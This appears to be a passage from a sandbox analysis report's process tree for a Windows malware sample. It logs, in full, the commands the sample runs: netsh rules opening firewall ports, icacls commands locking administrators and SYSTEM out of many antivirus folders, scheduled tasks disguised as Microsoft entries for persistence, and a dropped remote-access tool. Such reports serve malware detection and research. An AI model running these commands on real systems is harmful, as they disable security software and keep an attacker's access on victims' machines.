    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:2648
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:240
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:3692
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7724
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:7084
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:5292
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7340
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:7892
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:6208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6040
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:6696
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6672
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:3704
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7340
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6008
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:5024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:4700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6252
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:8156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7368
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:6076
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2660
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:8052
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4084
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:240
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1764
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1236
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:980
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6548
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6508
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5048
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8052
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5904
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1652
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5820
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5292
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1364
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4088
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:7424
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3444
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:664
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7804
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:564
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7892
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:4660
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6460
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5424
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:980
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8168
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3756
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:3120
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:3324
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7440
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5428
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4112
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7716
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7884

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:1080
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:3116
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:7528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DudleyTrojan.bat" "
1⤵
PID:5424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:8184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7444

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5820

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike(1).doc" /o ""
1⤵
PID:7584
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
  OfficeC2RClient.exe /error PID=7584 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=1
  2⤵
  - Process spawned unexpected child process
  PID:7088

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:6608

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike(1).doc" /o ""
1⤵
PID:1704
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
  OfficeC2RClient.exe /error PID=1704 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=1
  2⤵
  - Process spawned unexpected child process
  PID:7228

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike(1).doc" /o ""
1⤵
PID:6832
